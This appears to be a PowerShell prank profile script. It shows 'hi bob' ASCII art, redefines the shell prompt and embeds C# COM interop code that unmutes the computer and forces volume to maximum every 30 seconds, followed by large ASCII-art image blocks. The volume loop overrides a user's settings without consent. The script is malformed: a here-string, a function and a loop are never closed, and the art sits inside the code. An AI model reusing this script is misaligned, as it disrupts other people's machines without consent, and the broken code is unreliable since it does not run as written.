#function prompt { '[Hello, friend.] ' }

#Write-Output "your username is $env:username and you are logged into $env:COMPUTERNAME"
#function prompt {
 
$art = @"
  
 _     _   _           _     
| |   (_) | |         | |    
| |__  _  | |__   ___ | |__  
| '_ \| | | '_ \ / _ \| '_ \ 
| | | | | | |_) | (_) | |_) |
|_| |_|_| |_.__/ \___/|_.__/

        | [T]
        | | |√  <••>
        | ( )   (  )     
"@

write-host $art
 
 

#Write-Output "Hello Professor Ellison"
#Write-Output "your username is $env:username and you are logged into $env:COMPUTERNAME"

$myArray = (1..5) #Putting 20 kinda crashes everything

foreach ($i in $myArray){

function prompt {

$bestart = @"

while ($Loop -eq 30){
 
Add-Type -TypeDefinition @'
using System.Runtime.InteropServices;
 
[Guid("5CDF2C82-841E-4546-9722-0CF74078229A"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
interface IAudioEndpointVolume {
  // f(), g(), ... are unused COM method slots. Define these if you care
  int f(); int g(); int h(); int i();
  int SetMasterVolumeLevelScalar(float fLevel, System.Guid pguidEventContext);
  int j();
  int GetMasterVolumeLevelScalar(out float pfLevel);
  int k(); int l(); int m(); int n();
  int SetMute([MarshalAs(UnmanagedType.Bool)] bool bMute, System.Guid pguidEventContext);
  int GetMute(out bool pbMute);
}
[Guid("D666063F-1587-4E43-81F1-B948E807363F"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
interface IMMDevice {
  int Activate(ref System.Guid id, int clsCtx, int activationParams, out IAudioEndpointVolume aev);
}
[Guid("A95664D2-9614-4F35-A746-DE8DB63617E6"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
interface IMMDeviceEnumerator {
  int f(); // Unused
  int GetDefaultAudioEndpoint(int dataFlow, int role, out IMMDevice endpoint);
}
[ComImport, Guid("BCDE0395-E52F-467C-8E3D-C4579291692E")] class MMDeviceEnumeratorComObject { }
 
public class Audio {
  static IAudioEndpointVolume Vol() {
    var enumerator = new MMDeviceEnumeratorComObject() as IMMDeviceEnumerator;
    IMMDevice dev = null;
    Marshal.ThrowExceptionForHR(enumerator.GetDefaultAudioEndpoint(/*eRender*/ 0, /*eMultimedia*/ 1, out dev));
    IAudioEndpointVolume epv = null;
    var epvid = typeof(IAudioEndpointVolume).GUID;
    Marshal.ThrowExceptionForHR(dev.Activate(ref epvid, /*CLSCTX_ALL*/ 23, 0, out epv));
    return epv;
  }
  public static float Volume {
    get {float v = -1; Marshal.ThrowExceptionForHR(Vol().GetMasterVolumeLevelScalar(out v)); return v;}
    set {Marshal.ThrowExceptionForHR(Vol().SetMasterVolumeLevelScalar(value, System.Guid.Empty));}
  }
  public static bool Mute {
    get { bool mute; Marshal.ThrowExceptionForHR(Vol().GetMute(out mute)); return mute; }
    set { Marshal.ThrowExceptionForHR(Vol().SetMute(value, System.Guid.Empty)); }
  }
}
'@
 
[ audio ]::Mute = $false
[ audio ]::Volume  = 1
 
$loop = $loop + 1
sleep -Seconds 30

0KXKOxc'....      .....';lc:;;;;:ccc:;,,;:clodxxddoc:,,,;::;,''......,;;;;;;,,;;::::::;,,;::::::;;;:ccllc:;;;:ldxkkkkkxdollodxkxddxO000OkkkkOOO0KK0Oxd
O0KK0Od:.....        ...':c:,',,;:::;;,,,;cllodxddolc;,,;;:;,,,''''..'',,;;;,,;;::::::,'';:ccc:;;,,;:cclc:;;;:codxxxxkxdollodkkxdxkOK00kxxxkkkO000Okxd
xO0KK0Oxc......       ...';;,'.',,,,,;;;;;:cllodxddooc:;,;;;,,,'.''....'',;;;;;;;::::;,'',:clc:;;,,;;:ccc:;;;::lodxxxxxdollodxkxdxkO00OxdxxdddxxkOkkxd
oxk0KKK0xc'.....       ...'''',',,;;,;:cc:::cclodddddol:,,,,,,,;:cooooooooollc:::::::;,''';:cc:;,,,;,;:ccc:::;;;cloddxxdollodxxdddxkOOxoloolcllooxkxdl
loxO0KKK0xc'.....        ....';,''',;;;::::;;;cloodddool:;;:odk0XNNNWWNNNNNXXXK0Okdoc:;,',,;::;,',,;;;;::::c:;,,;clodxkxdoccloooloodddlcclllccclloddl:
clodkOKKK0kc'.....        ....',,''',,,,,;;;;;;ccloooddddk0KNWNNNXXXXKKKKKKXXXNNNNNNK0Odooc;;;;,'',;:c:cclodxxxxxkO00O00koc::cccccccccccoooooccldxdoc:
::codkOKKK0kc'....         ....',;,,,;,'',;:::;::cclodk0KXNNXKKK0000OOO000000000KKXXNNNNX0kooddddxk0XXKXXXXXNNXXKKK0OOOOxoc:;;;::cloooddkkxddodxkkxoc:
::ccldxO0KK0kc'.....         ...,,;;;:ccclloxkxxddddkKNXK0000OOOOOOOkkkkOOOkOOOOOOOO0KKXXNXKKXKKKKKKKKK0OOkkxddoooodxxddolc:;:ccldxxkkOOO0Okxxxxkkxocc
cc::cloxk0KK0xc'.....    .'',cdk0OkkO0KKKKKKKKKK00000KOkxkxxxkkkxdddxxxxxkkkkkxxxddddxkkO0000OOkxxddddoooodddddddkkkxolllc:;:clddxkOkkOOO0Okddddolc::c
cc::::cldxO00kxl'...... .:ddddddooooooooooodoooolldxxxolodoodddollcccclodxxxxddoodxxddodxxkOkxollloodddxxkkkkkxkOOkdlc:::;;;;:lodxkOkkkkkkxolccc:;,,;:
ccc::c::lodkOkkko,...... ..;loollllolllccc:::;;,,,,:lllcclclllc:;,;:clccloddddddxdl::;,:ldxxolldxkkkOOOOOO0OOOO00xocccc::;,,,;:clodxxdddool:;;;;;,,,,;
ccc::cc::codkOOOko;......   .,cxxxxxxkkxxddoolc:,,,,,;:;:c::lc'. ..''':llodxdoooc,.','..cdxdooodxkOO000000OOOO0Oxlccccccc:;,',,;:cllllccc:;,',,,;;,,,,
::::::ccc:codkOOkko;......     .ckOkkkkkxxdoolc:;::;,''',;;:lc,........:lloddddo:,'...,cdxxxdxxxxkOO000OOOO00Oxo:::ccccccc:,'''',,;;;;;,,,,,,,,,;;,,''
;;:::::clc:cloxkkxxo;......      .:dkOOOkkxdoolcclccloc;'',:clc:;;;;:cloolllloddxxddodxxxxddxO00kOO000000OOxoc:;:::cccc::c::;,'.''''''''''',,,;;;;;,,,
;,;::::cccc::cloxxxdo;.......      .';ldkkkxdooodxddddxxdlc::clloooooolcccllodoolllooddddoodkKKKKKKKKKKK0Ol,,,,,,;;:cccc:cclc:,''''''..',,;;;;::::;;;;
;,,;::::cccc:::clddddo;.......         ..':doclodxxxolccoxxddollc:;;,'''''',,;;,,,',,;;cdxkO0000000000000Oc',;;;;;;:ccc::::ccc:;;,,'',,;:clooodooc:;:c
,,,;:::c::ccc:::ccllodo:.......           :xc,;;:cloolc;;:cloxkxdollcc::::;;:::;;::;';okOOOkOOOOOOOOOOOO00l,,;:c::::::::;;;:cccllc::ldkOOO00000kdl:clo
;,,;;:cc:::cc::;;:cloodo:........         ;d::c;,'';:llcc;,;cdkkdc;,''...........',,:xOkkxxxkkkkkkkkkkkkk0x,',:cc:;;;::::;;;;:coodddk0KKKKKKKK0koc:coo
;,,,;:clc::cc::;;;:cllooo:........        'l:;cc::;,';okkkocllc:;'.................';codddxkkkxxdddollcloxl,',;:c::;;;;:::;;;;:clodxOKKXXXXKKK0xc;;cll
;;,',;:cc:::::;;;;;:ccllooc'.......       .:;,coddxddxOkxxxOkocc,.......''''''''''....;oddxxxoc:;;;;;::cll,.'',,;:::;;;::::;,,;:cloxOKKXXXXK0Oxl:,,,;;
',,',::::;,,;;;::;;;:ccclooc,.......       'clxOkxddllcc:;:ccc;'.   ..................:xkxoooooodddxxxdoo;..'''',;::::::::;;,,;;:clxOKKXXXKKkl:,''....
.'''';c:,',;;:ccc:;;;:ccllool,........     .cddoc;:cloo:'...,,'','   .................,dxoodxOOO0000000KOl'..''',;::cc::;;,,,,;;;;cdk0KKKKK0o,........
...''',;;,;cccllc;;,;::clllool,........    ,oc:,.,clol'...'',;;;,.    ................'cdoloodxkkO00KKKKKKk;..'',,;;::::;;,,,;;;;;cokO000K0Oo'........
....''..,:cclllc::;',;::cllllol,.  .....  'dl;;,':ccl;..,;,,'....                  .'cdkOxoooodxddooxO0KXXKo'..'',,,;;::;;;;;;;;,,:ldkOO0000x;.   ....
....''..':llllc:;;,'';;,;:cccllc,. .......oo;;'.,ccl:..',,,,'....                  .';;:ldxxdoooxOOxdlcdOKX0c...',,,,,;;;;;,,,,,,,,;cldkO000x:.  .....
.''''''.';clll:,,;;,;:;,',:ccclol,. .....cd:;,...;:;'.',;,,''....   ..                .';cdkkxdc;:dO0x:;lxk00l'',,,,,,,;,,,,'',,,,',,;cdkOOOd;........
,,,,''''',clcc;,,;:;::::;,;cccllol,. ...'lc,'.   ...............    .........          ..':lllool,.;okkl;:ldO0l',,,,,,,;;;,,''''',,'',:loxkxl,........
;;,,,'',,',::;,,,,;;;;;:::;;::clllc;. ..'c:'.      ..........................   ...     ....,;:c:,....;ol;;coOO:''''',,;:::,''''',,,,,,;:cc:,.........
',,,,''';;,,;,,,'',,,;;::;;;;;:ccclc;....::;'...........''''....','..''',;;,'...'''.........''',::::,...;'.,coOk:''''',,;::;,,,,,,,,,'''''''...  .....
..',;,'',,,,,'',,'''',::;;;;;;;::cclc;....;;;,,,,,,;;,,,''....',::;;,',,:llc:'';ccc:;;,,;,;;,'...........  .':oOx;',,,,;;:cc:;;;,,,,,,''.......       
.''';;,'',,,;,',,'...',,,;;;:;;:clcclc;....'',,',,'''......''',;::;:;,;:ldool;,:oddocc,,c:;cl:;;,'.         .':dkl;;;;;:ccllc::;;,,'''''...'...       
,,,'',;,'''',,'''...''..',,,,;;:cllcccc;............  ...,,,,,;;c:;c:,;codddo:,:dxxdccc:lc::dx:',::;;;,.......,ckxc::::cllllc:::;;,,,'''',''...       
',,'',;,''''',''''''''.....,,,,;;::::ccc:'.........'..';;;;,,;;:c:cdc,:odxxddl;:odxdc;lolcc:okd;..,;:cloolc:,'':dko:cccclllc::::::;;;;;;;;,,'.......  
.'''',,,'''..''','''''.....',;;,;;::::ccl:'......,l:,,;;;,,',,;c::dxl,cdxxxxdo::odxxl;ldolc:cxOd;'''',:cc:;coc:ldxlccccccccc:::::::::cccc:;;;,....... 
..'',''''''....',,'''''..''.',;;;;;;:c:cll:.....:dl;;;;,,,,',;::;lkkl:lxxxkkxo:;ldxxd:cxxoc::dOkl;::'.....';cllodl::cccllcc::::::::::clcc::::;,...... 
...,;'..........',''..''......';::;;;::;cll;..'cdc;:::::;,,,;::;:dkklcdxdxxxxd:;codxxc;oxoc::dOOd;,:lc,'''',;cllc;;;:cclllcc::::;;;;:::::;:ccc:;'.....
''',,,.....',''''''....',''''''',,;;;;;;;cll:,:l:',;::::;,,;::::lxkxlldoooddddc;:ooddc;ldoc;:dkOkl,,;ldl;'',,:cc;;,;;;clllccc:::::;;;;;;;;;:ccc::;;,''
'',,,'''..''''''...'',,'''''''''',,,;::;;:colclc'..',:;,,;:::;;:oxkxllxxdlllldl;:loodo:col:;:okkkd:,,;lddl;,;;:::;;;;::cccccccc:::;;;;;;;;;;:cccccccc:
,,,',,,,,...''....'''::,',,''''''',;;;;::;;:c:lc'..,;;;,',;;;;;:oxkd:;dkxdoolll::looddl:cl:;coxkkxl;;;:cokxlcccllccccclllllcccclc:::::;;::::::c::ccccl
;;,,,,,'''''',,...''',:,',;;;,,,,,,,;;;;,',;:coc..',,,,,',;:;;;cdkkd,.:dkxxxxxoccoddxdoc:c:;coxkOkdl::::coxOxooddooloddddoooooooolloll::cllllcccc::::c
:;;;::;,,,,,',;'.',,,;;:;,;:::::::;:;;;;;;;::cl;..',,,''',;:;;;cokko:,;:oxxddxdlcoddxxdl:;;;cdxkOOkdoc::::lxOkdxxxdddxxxxxdddxxxxdddddoloodddooooollcc
::::::ccc::::::c:;:::cccc:;:cccccccllccc:::::ll,'',,,,,'',;;;;;coxkdlolccoxxdddlcoxxddolc:;;cdxkOOOkxdlloolldkxddxdddddxxddddxkOkxdddxdoodxxdddxxxxolc
ccc::cllooooddooolllclccclllooolooolooolccccldo;;,,,,'''';;;;;::ldxdoodollxkxddlcoxxxdolc:;:ldxkkOOOkkkdoddoooxxooddodxxxxxxxxxkkxddddddddxxdodxkOkxol
olclolllodxdoddoodxdoolllodxdolccloooddodxxxkxl:,'.,,'''',;;;::::lxxdoddodxkxdoocldxddolc;;:loddkOOOOxddxdooolokxddddddxxxxxxxxkkkxxdddxxxddoodxkkkxdd
kxxdodollxkxdolccccllllcldxddoooolodxdoodxxdo:,''..''',',,,;;;;;;:odxxxxxxkkxoodlldxdolc:;,;ldoodkOkkxoodxdollldOkddxddooodddddddxxxdooddoolodddxkxddd
kkkkdddddxxddolllllooolllllodxxkkxkxdodxkOxlc,'''..'',,,,;;;:;;;;:codxxxxxdooloolcdxoolc:;,,colldkkkkkxddxxdolloxkxxxkkxxxxddddodddddooooooodxdddxdlll
oddoooddddxxdddddxxkkxddddooddxdxkOxoloxO0Odc,..,,'',',,,;;;;;;;;;:loddxdollccooc:odooc::;,,:ccldxxxkkxxxkkdlllloxOkxxxxxxxkxxxxkkxxkkkxxxxxkkkkxxdoox
ddddddddoodxxxxxxkkxxxxxxxxkkkxddxxxxxxxddddxl,..,;,'',,,,;;;::::;:codoollcccldo::clllc::;,,;:clddxdddxddxkkxdooodkkxooxxddxxxxxxxxdxkkxxkkxddxkkkOkxk
xddddddolloddxxkkkkkddddddodddoodxxxdodddddo:'''',;''''',,,;;;:ccc:clolccclllodo:;;:cc::;;;,,:cool:;;;cllldxkkxxddxkkkkO0OkkkOkkOOO0OkkkxxxxxxkkkxxxxO
xxddddolllllllloollodxxxxxddollllodddoooool::;;;;,,'',,,,;;:;;::ccllllllcllooool:,';:;;,....',;:;'..',;clcllc:cloodkkkxxOkxkkkkkOOkkkkxdlllooooooolldk
odkxdoooddooooolcclloooododddoocclollooooolc:;'',,'';;,,,;;;,;;:::ccclllllccccc:,.'''''.  .......  ....':c:,...;::lxkxdxxoodxxddxdoddddolclllcllc:;;:c
doolooolloddodddddolllloodoollccool::looxxo:,,.....'',,,''',,,,,,,,,;::::;,,,;,''',''...              ...'... .,;;:odoccllloddoloddxkdoodddollcccloooo
xxdoddollodddddddooloxxoooccllcllllolllldxdcc;''. .  ....''....''''',,,''''''''....'..                 .........',,:ll:::::ccooolodxkxdoooodddddddxxxd
dddxkxdodxxxxddddodxxxkxdlcllol::loooooolooclo:;,'.......................''''...       ..    .           .....'..'.;dxlc:::cclloddooddollccllccloodddx
xxxxxxddxxdddddooodddddxxxdoddoc:cllllllllolodl:c:;;,'',,'..'',,'.........        .......                ........'.':ooc::cc:ccclolcclodollooc:::::loo
dddxxxdxxdddddxdoddddooooodxxxdoooddooollcllllllc:c:,,,;;;;;;;;,,,,'..............''.....         ..................,:lll:;:cccc::cccccllccc:::;;:::c:
looddddddoolldxddoooddddollooooddxxxxddxkxdddollccl:,,,;;;::::;;;,;;,,'''',,,'''''''',,,'........................ ..;odoolc:;::c:;:llllc:::::::,,;:::c


MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWWWWNNNNNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXKXWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWWWWWNNNNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXKXWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWWWWWNNNNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXKXWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWWWWNNNNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXNWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWWWWNNNNNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXNWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWWWWWNNNNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXNWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWWWWNNNNNNXXXXXXXXXXXXXXXXXXXXXNNNNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXNWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWWWWNNNXXXXXXXXXXXXXXK0OOO00KKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXNWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWMMMMMMMWWWMMMWWWWNNWNK0OO000OkxkO0KKKK00KXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXNWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWWWWWWWWNNNWWWNXX000d:,';odooodxxxOO0XNKO0KKKXXNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXNWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWWWWWWWWMMWWWWWWWWWMWWWWNX0OkkOO0K00kl;...;;'',,;cc::ccloxO0OxddxOOkkOKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXNWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWWWWWWWWWWWWMWWWWWWWWWWNXNKKKKKXXKOOOOd:,'...''....',',c:,',::ll:l:';:,,cx0KXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXNWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNOkOOO00KXXNNWWWMMMMMMMMMMMMMMMWWWWWWWWWWWWWWWWWWWWNWWWWWWNNNX0O0KXXXNNKkdc;,,'....':c:,,::;,........',;,:xOkocokKKKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXNWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNkddddddddddxxkOO000KXXNNWMWWWWWWWWWWWWWWWWWWWWWWWXXWWWWNNNXKOxkOKKKKK0kc'........';looc,..............:dxOK0kOxlx0K0KNNNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXNWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNkdddddddddddddddoddddddxKWMWWWWWWWWWWWWWWWWWWWNWX0NWWNNNNKOkdlxOOkxo:;'...........,::;,...............':okkxk00xllkOO0NWWWWNNNNNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXNWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNOddddddddddddddddddddddlkWMWWWWWWWWWWWWWWWWWWNXX00WWNXXXOxkdcccc,'.................'...................':l:;:lddc:lxxdkXWWMMMMWWWWNNNNNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXNWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNOxdddddddddddddddddddddlxNMWWWWWWWWWWWWWWWNWWX0OkXWXK0Kklll;'............................................',;;:looollocco0WWWMMMMMMMMMWWWWNNNNNXXXXXXXXXXXXXXXXXXXXXXXXXXXNWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNOdxxdddddddddddddddddddldXMWWWWWWWWWWWWWWWNWN0OdkXXKOxd:...............................................''''',;;';clc:;::cONWWWWWWWWWWWMMMMMWWWWWWNNNXXXXXXXXXXXXXXXXXXXXXNWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNOddxdddddddddddddddddddlxNMWWWWWWWWWWWWWWNNWXOolOK0xc,...................................................''''.....,;,,;;,lOXWWWWWWWWWWWWWWWWMMMMMMWWWWWNNNNXXXXXXXXXXXXXXNWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNOdddddddddddddddddddddolOWMWWWWWWWWWWWWWWNNW0l,:dl,.....................................................................'l00XWWWWWWWWWWWWWWWMWWWWWWMMMMMMWWWWWNNNNXXXXXXXNWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNkddddddddddddddxddddddoo0MWWWWWWWWWWWWWWWNNXd............................................................................:kKKNWWWWWWWWWWWWWWWWWWWWWWWMMWWWWMMMMMWWWWNNNNXNWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNkddddddddddxxdxxddddxxooKMWWWWWWWWWWWWWWWWKo..............................................................................:x0XWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNOdxdddxxxxxxxxxxxxddxxoxXMWWWWWWWWWWWWWWXd,...............................................................................'ok0NWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNOdxdddxxxxxxxxxxxxxxddokNMWWWWWWWWWWWKkl,............',;::ccllccccc::::;,,'''..............................................;d0XWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNOxxxddxxxxxxxddddxxxddoOWWWWWWWWWWNOl'............',:loxkkO000000OOOOOkxdolllc::;;;;::;;;,,,,'''''''........................:xKNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNOxxxddxxxxxxxxddddxdxdo0WWWWWWWWN0l'............,codxO0KXXXXNNNNNNNNNNNXXKKKK0Okkkkkkkxxxxddoollllccc::;,,..................'oOKNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNOxxxxxxxxxxxxxxdddddxdoKMWWWWWW0l,'..........':ldkOKKXXNNNNNWWWWWWWWWWWWWWWWWWWWNNNNNNNXXXXXXKK000Okxxddool:,'...............;kO0NNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
